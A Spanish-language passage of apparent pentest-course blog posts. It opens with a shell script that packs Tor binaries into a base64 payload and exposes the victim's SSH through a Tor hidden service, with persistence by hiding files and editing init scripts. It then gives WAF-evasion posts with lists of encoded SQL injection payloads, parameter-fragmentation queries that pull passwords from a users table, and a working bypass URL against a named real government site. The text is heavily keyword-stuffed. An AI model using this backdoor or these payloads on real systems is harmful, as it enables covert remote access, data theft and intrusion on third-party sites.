Todo esto está automatizado por un script en Perl escrito por expertos de pruebas de penetración, por lo que vamos a utilizar.

wget http://www.rkeene.org/devel/htp/mirror/archive/perl/htp-0.9.3.tar.gz

tar xzvf htp-0.9.3.tar.gz

cp htp-0.9.3/sbin/htpdate-light .

Vamos a comprimir nuestros binarios en un archivo comprimido para reducir el tamaño de carga útil.

tar cvzf binaries.tar.gz tor htpdate-light

Ahora vamos a crear nuestro script de playload, vamos a codificar el archivo con base64 y crear un nuevo script “payload.sh”:

echo ‘#!/bin/sh’ > payload.sh

echo -n ‘torbin=’ >> payload.sh

cat binaries.tar.gz | base64 -w 0 >> payload.sh

Ahora abre “payload.sh” en el editor de texto y pegue el resto de la secuencia de comandos que hay:

tar xzvf binaries.tar.gz

rm binaries.tar.gz

chmod +x tor

echo ‘

Bridge 176.182.30.145:443 DE54B6962AB7ECBB88E8BC58BEA94B6573267515

Bridge 37.59.47.27:8001 E0671CF9CB593F27CD389CD4DD819BF9448EA834

Bridge 192.36.27.122:55626 35E199EFB98CDC9D3D519EA4F765C021A216F589

UseBridges 1

SocksPort 9050

SocksListenAddress 127.0.0.1

HiddenServiceDir ./.hs/

HiddenServicePort 2222 127.0.0.1:22

‘ > ./torrc

perl ./htpdate-light google.com

./tor -f ./torrc

Para ejecutar el script

bash payload.sh

Se debe encender el servicio oculto Tor y enlazarlo al oyente SSH. Según curso de seguridad en redes, sólo tenemos que copiar el nombre de host que se genera en ./.hs/hostname y conectarse a través de ssh.

YENDO PERSISTENTE

Si deseas que este se inicie en el reinicio del sistema y tendrás la acceso root a la máquina, para la forma más fácil es simplemente modificar un script de inicio existente. Según recomendaciones de expertos de pruebas de penetración, lo ideal sería copiar los archivos binarios y archivos de configuración de Tor a un lugar poco visible, y luego modificar la secuencia de comandos “init” para que Tor se ejecute cuando se inicia el sistema.

EVADIR PROTOCOLO DE INSPECCIÓN Y OFUSCAR EL TRÁFICO

Acuerdo a expertos de pruebas de penetración, Tor se puede configurar con ofuscación y pluggable transports para hacer que el tráfico vea algo como no lo es. También hay opciones que pueden configurar en el archivo “torrc” para impulsar el tráfico a través de un servidor proxy. Usted puede aprender más acerca de este durante el curso de seguridad en redes.

¿CÓMO PROTEGERSE?

Por desgracia, este tipo de ataque es difícil de bloquear a nivel de red – es por eso es que lo usamos. Usando pluggable transports y / o puentes de Tor bridges, un experto de prueba de penetración puede ocultar el tráfico para que aparezca como HTTP o HTTPS regulares, e incluso puede dirigirlo, a través de tu proxy corporativa utilizando algunas opciones en el archivo “torrc”.

Según maestros de curso de seguridad en redes El primer paso es para asegurar que el tráfico de salida TCP está siendo correctamente filtrado. Todo el tráfico de salida debe ser forzado a través del proxy corporativo.

Los sistemas de inspección de paquetes en proxy pararán ingenuos intentos en este tipo de ataque, según maestros de curso de seguridad en redes. Además aletas deben estar configurados por las conexiones de Tor detectadas.

¿CÓMO HACKEAR FÁCILMENTE FIREWALL DE APLICACIÓN WEB (WAF)? PARTE 2

Posted on

En un artículo anterior hemos cubierto algunas técnicas de hackeo de firewalls de aplicación web. En este artículo vamos a cubrir el resto de las técnicas con ayuda de expertos de pruebas de penetración.

DOBLE CODIFICACIÓN PARA HACKEAR UN FIREWALL DE APLICACIONES WEB

Como hemos comentado antes, hay muchas aplicaciones que juegan un papel para pasar su solicitud desde tu navegador a la base de datos. Este truco se basa en explotar este comportamiento cuando nuestra solicitud se decodifica dos veces antes de que llegue a la base de datos. Como sabemos que el servidor web hace la descodificación básica de URL, ya que pasa los parámetros de solicitud a la aplicación web. Pero ¿qué si el desarrollador nuevamente hizo la decodificación? Bueno, sí hay muchas ocasiones en que el desarrollador decodifica la solicitud antes de usarla. De aquí surge una vulnerabilidad. A veces podemos utilizar este comportamiento para hackear un firewall acuerdo a expertos de seguridad perimetral.

HACKEAR LOS FILTROS QUE DISTINGUEN MAYÚSCULAS Y MINÚSCULAS

Como comentaron los investigadores de soluciones de seguridad de la informaciónanteriormente sobre el conjunto de reglas definidas por el firewall de aplicaciones web, si usted sabe algunos conceptos básicos de Regex entonces no hay necesidad de decir que la diferencia entre ellos:

/union.*select/
and
/union.*select/i

Bueno, si usted no sabe, entonces deja que te expliquemos. El primero de ellos distingue mayúsculas de minúsculas y el segundo no, mientras haces que Regex maneje este error que puede pasar a veces. Esto da origen a este tipo de ataques según curso de pruebas de penetración.

CONTAMINACIÓN DE PARÁMETROS/ HTTP PARAMETER POLLUTION HTTP

Puede ser que muchos de ustedes han oído hablar de él, pero estoy seguro de que pocos lo hubieran utilizado alguna vez. En primer lugar que es HPP, Definición en OWASP – El suministro de múltiples parámetros HTTP con el mismo nombre podrían resultar que una aplicación interprete los valores de manera imprevista. Consultores de soluciones de seguridad de la información comentan que mediante la explotación de estos efectos, un atacante puede ser capaz de pasar por alto la validación de entrada, provocar errores de aplicación o modificar los valores de variables internas. Como HTTP Parameter Pollution (HPP) afecta a un componente básico de todas las tecnologías web y existen ataques contra seguridad perimetral.

Los ataques HPP consisten en inyectar delimitadores de texto en una consulta codificada en otros parámetros existentes. Si soluciones de seguridad de la información no limpian adecuadamente el ingreso del usuario, un usuario malicioso puede comprometer la lógica de la aplicación para realizar ataques, ya sea del lado del cliente o del lado del servidor. Una de las consecuencias de los ataques de HPP es que el atacante potencialmente pueden ignorar los parámetros HTTP no modificables existentes para modificar el comportamiento de seguridad perimetral, los controles de validación de entrada de derivación, y el acceso y posiblemente explotar las variables que pueden estar fuera del alcance directo.

Los ataques HPP se puede definir como la posibilidad de anular o añadir parámetros HTTP GET / POST mediante la inyección de delimitadores texto en una solicitud. Acuerdo a experto depruebas de penetración, esto afecta a base de todas las tecnologías web existentes tanto, los ataques del lado del servidor y del lado del cliente.

Explotando las vulnerabilidades de HPP es posible:

  • Invalidar parámetros HTTP fijos existentes.
  • Modificar los comportamientos de las aplicaciones.
  • Acceso y, potencialmente explotar, variables incontrolables.
  • Omitir la validación de la entrada, puestos de control y reglas de la WAF.

Aquí es una tabla que muestra el comportamiento por defecto de estas aplicaciones con HPP.

hack WAF

HTTP PARÁMETRO FRAGMENTACIÓN/ HTTP PARAMETER FRAGMENTATION (HPF)

La idea de utilizar HTTP Parameter Fragmentation (HPF) cuando se llama a una aplicación web con el fin de hackear los filtros de seguridad no es una nueva. De acuerdo con curso de pruebas de penetración, este método le permite a uno para omitir con éxito filtros utilizados en la mayoría de los firewalls de aplicaciones web modernas. Así que, ¿cuál es la esencia de esta técnica? Consideremos ejemplos de la explotación de inyección SQL.

A menudo es necesario tener dos o más parámetros de usuario en un código SQL, por ejemplo:

<br />Query(“select * from table where a=”.$_REQUEST [‘a’].” and b>”.$_REQUEST [‘b’]);<br />Query(“select * from table where a=”.$_REQUEST [‘a’].” and b<“.$_REQUEST [‘b’].” limit “.$_REQUEST[‘c’]);<br />etc.<br />

En la fase de verificación de los valores de los parámetros recibidos del usuario en el nivel de aplicación web, la aplicación es capaz de operar con solo variables del servidor web y WAF es capaz de operar directamente con los datos de HTTP. Sin embargo, independientemente del método de acceso a los datos, se trata de utilizar ciertas expresiones regulares (regexps) para cada parámetro por separado.

<br />preg_match(“/(uni)(on.+sel)(ect)/is”, $_REQUEST [‘a’])br
</>preg_match(“/(uni)(on.+sel)(ect)/is”, $_REQUEST [‘b’])br
</>preg_match(“/(uni)(on.+sel)(ect)/is”, $_REQUEST [‘c’])br />…br
</>preg_match(“/(sel)(ect.+fr)(om)/is”, $_REQUEST [‘a’])br
</>preg_match(“/(sel)(ect.+fr)(om)/is”, $_REQUEST [‘b’])br
</>preg_match(“/(sel)(ect.+fr)(om)/is”, $_REQUEST [‘c’])br />…br />

Por lo tanto, si uno se divide la lógica del código SQL entre varios parámetros que entren en el código SQL y luego concatena estas piezas utilizando los comentarios, será posible hackear los filtros de soluciones de seguridad de la información:

/?a=1+union/*&b=*/select+1,2
/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users

<br />Query(“select * from table where a=1 union/* and b>*/select 1,2”);<br />Query(“select * from table where a=1 union/* and b<*/select 1,pass/* limit */from users”);<br />

Dado que los comentarios se ignoran, el código de hecho es:
select * from table where a=1 union select 1,2
select * from table where a=1 union select 1,pass from users

Uno puede notar que teniendo en cuenta la vía de ataque, HPF es muy similar a la HPP (HTTP Parameter pollution), pero a diferencia de este último, la aplicación HPP tiene por objeto la explotación de la vulnerabilidad en seguridad perimetral, no en el entorno de la aplicación. Según empresa de pruebas de penetración, por supuesto, ambos métodos de ataque pueden complementar entre sí.

 

¿CÓMO HACKEAR FÁCILMENTE FIREWALL DE APLICACIÓN WEB (WAF)?

Posted on

Firewall de aplicaciones web se implementa típicamente en algún tipo de proxy justo en frente de las aplicaciones web, por lo que no se ve todo el tráfico en nuestras redes. Al monitorear el tráfico antes de que llegue a la aplicación web, firewall de aplicaciones web puede analizar las solicitudes antes de pasarlas. Esto es lo que les da una ventaja sobre el IPSS. Debido a que IPSS está diseñado para interrogar a todo el tráfico de la red, no pueden analizar la capa de aplicación tan a fondo como firewall de aplicaciones web según expertos de pruebas de penetración.

Aquí hay un ejemplo de MOD security WAF

URL normal

http://bpc.gov.bd/contactus.php?id=4

Detectado por MOD Security

http://bpc.gov.bd/contactus.php?id=4′ UNION SELECT 1,2,3– –

Sin detección:
http://bpc.gov.bd/contactus.php?id=.4’/*!50000UNION*//*!50000SELECT*/1,2,3,4,5,6,7–

Ahora, antes de continuar nos gustaría compartir un hecho muy interesante sobre este sitio, este sitio es vulnerable desde hace mucho tiempo según diferentes expertos de seguridad perimetral. La última vez los hackers lo atacaron y se tomar el control del sitio. Esta vez, cuando comenzamos a atacar hemos encontrado que algo ha cambiado. El único cambio que hizo, es que ahora están utilizando dos soluciones de seguridad de la información. Es como si el administrador no quiere perder el tiempo en cambiar el código de la aplicación y eliminar la vulnerabilidad. Recuerde que firewall de aplicaciones web es una buena seguridad perimetral, pero no se puede simplemente dejar la aplicación vulnerable sin hacer pruebas de penetración y completamente depender de firewall de aplicaciones web para la seguridad.

DETECTAR EL FIREWALL DE APLICACIONES WEB

Según investigadores de soluciones de seguridad de la información, hay muchas herramientas y secuencias de comandos que pueden detectar la presencia de huellas de WAF sobre una aplicación, que incluya pero no se limite

  • NMAP
  • WAFw00f
  • Verificación de los encabezados de respuestas
  • Verificación de la respuesta
  • etc.

DETECTANDO FIREWALL DE LA APLICACIÓN WEB USANDO NMAP

nmap -p80 –script http-Web Application Firewall-detect <host>

FINGERPRINTING WAF USANDO NMAP

nmap -p80 –script http-WAF-fingerprint <host>

FINGERPRINTING WAF USANDO WAFW00F

WAFw00f.py <url> 

Una vez que conoces el firewall de aplicaciones web con el que estas tratando, puedes buscar formas de hackear seguridad perimetral.

TÉCNICAS UTILIZADAS PARA HACKEAR SEGURIDAD PERIMETRAL

Con ayuda de expertos de pruebas de penetración, vamos a aprender varias técnicas de hackear un firewall de aplicaciones web y una vez que hayamos terminado, vamos a acoplarlos y mezclarlos las técnicas entre sí para cortafuegos avanzados de aplicaciones web.

DIFERENTES TIPOS DE CODIFICACIÓN

Hay muchos tipos de codificación, algunos de ellos son respaldaos por el servidor de aplicaciones, algunos de ellos cuentan con el apoyo por la aplicación web y algunos otros son soportados por el servidor de base de datos. Cuando enviamos una solicitud esta pasa por muchas capas y diferentes tipos de aplicaciones antes de nuestra solicitud llegas a la base de datos, por lo que muchas veces somos capaces de utilizar diferentes tipos de codificaciones y doble codificación que no son compatibles con el servidor de base de datos, pero las otras aplicaciones en medio, pueden decodificar nuestra solicitud y pasarla al servidor de base de datos. Según expertos de pruebas de penetración, a veces tomar ventaja de este tipo de comportamiento nos ayuda a hackear un firewall de aplicaciones web.

Vamos a dar un ejemplo básico, hay un buen servidor de seguridad implementado en una aplicación. La aplicación ha obtenido una solicitud de parámetros que primero se codifican como Base64 y luego Rot13. Cuando se inyecta dicha solicitud nuestra solicitud será codificada y pasa firewall de aplicaciones web, la próxima cuando se llega a la aplicación se decodifica y luego se envía al servidor de base de datos. Aquí pasamos el firewall de aplicaciones web, ya que nuestra solicitud fue codificada y decodificada antes de que pasará a la base de datos.

De esta manera, hay muchos tipos diferentes de codificaciones que podemos utilizar para hackear un firewall de aplicaciones web por ejemplo, URL Encoding, Hexing, Binary, Unicode, etc. En primer lugar vamos a empezar con hackeo de las reglas de condición de pruebas que muchos firewalls de aplicaciones web están bloqueados estos días como:
Las verdaderos condiciones de bloqueos

1 or 1=1
1′ or ”=’
1″ or “”=”
1′ or true#
1″ or true#
1 or true#
etc.

Ahora vamos a mezclar un poco de sentido común y codificaciones para hackear este tipo de filtros:

or ‘1
|| ‘1
null’ || ‘a’=_binary’a
1′ || ‘a’=x’61
1′ && ‘0’=x’30
1′ %26%26 %270%27%3dx’30
2′ && 0.e1=_binary”0
1 or 1.e1=0b1010
‘ || 1 like 1
‘-‘
“-“
‘ || 2 not like 1
110 or x’30’=48
‘1’!=20
1 or 20!=’1′
2 and 2>0
3 || 0<1
12 || 0b1010<0b1011
0b11 || 0b1010x’30’
1 or 0b1
2121/**/||21
111′ or _binary’1
1 or 2121
1′ or 12 rlike ‘1

Según consultores de soluciones de seguridad de la información, usando las técnicas anteriores y mezclándolas hasta que puede generar miles de diferente payloads y técnicas. Aquí hemos utilizado la codificación Binary, Hex, así como algunas palabras clave para hackear. En realidad firewall de aplicación web detecta cualquier cosa maliciosa utilizando el conjunto de reglas definidas. Por lo que necesitamos generar algo diferente para confundirlos.

Si no entendieron anteriormente las técnicas aquí hay una explicación básica del uso de Binary, Hex, Like y Rlike en SQL
Binary
Select 1 from dual where 0b1010=10
Hex Type 1
Select 1 from dual where ‘0’=x’30’
Hex Type 2
Select 1 from dual where 0x30=’0′
Like statement
Select 1 from dual where 1 like 1
Rlike Statement
Select 1 from dual where 12 rlike 1
|| (OR)
Select 1 from dual where 1||1
&& (And)
Select 1 from dual where 1&&1

Como sabemos SQL no soporta la codificación URL, pero el servidor y aplicaciones web sí soportan. Así también podemos utilizar la codificación de URL para hackear firewall de aplicaciones web menciona experto de soluciones de seguridad de la información. Lo primero es entender cómo funciona. Algunas veces cuando un firewall basado en la red esta implementado o firewall de aplicaciones esto podría suceder que el firewall de aplicaciones web no está decodificando nuestra solicitud mientras que está comprando con el conjunto de reglas. Cuando nuestra solicitud llega al servidor o la aplicación, entonces se descodifica, y luego se pasa al servidor de base de datos. De esta manera la codificación de URL también nos ayuda a hackear firewall de aplicaciones web muchas veces.

Los siguientes son algunos ejemplos de URL codificada para hackear WAF:

%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO%57%20select
union%2053elect
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
uni%6fn distinct%52OW s%65lect
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74

Usted no está obligado a utilizar la codificación URL sólo con unión select también se puedes codificar otras palabras clave u operadores.

Veamos algunos otros usos de codificaciones, aquí se asume un firewall de aplicaciones web se ha bloqueado o filtrada uso de ‘0x’ para filtrar uso de hex en tu inyección y comillas simples o dobles no están permitidos. Incluso a veces los firewalls de aplicaciones web usan para descodificar Hex de solicitudes y comprobar si hay contenido malicioso. Podemos tratar las siguientes formas de superar la situación.

Normal Hex (Blocked)
select 0x313131
Hexed Bypass Version
select x’313131′;
Binary Bypass
select 0b011110100110010101101110;
Bypass using functions
select unhex(x’333133313331′);
 

Y así podemos seguir adelante para hackear el firewall de aplicaciones web de muchas otras maneras. Ahora esto todo es la codificación básica y su papel en hackear el firewall de aplicaciones web. Según experto sde pruebas de penetración, algunas veces también puede utilizar la codificación UTF-8 URL para hackear firewall de aplicaciones web, lo cual también se puede aprender en el curso de seguridad perimetral.

En siguiente artículo vamos a cubrir más sobre seguridad de aplicaciones web y como hackear firewall de aplicaciones web con ayuda de expertos de soluciones de seguridad de la información.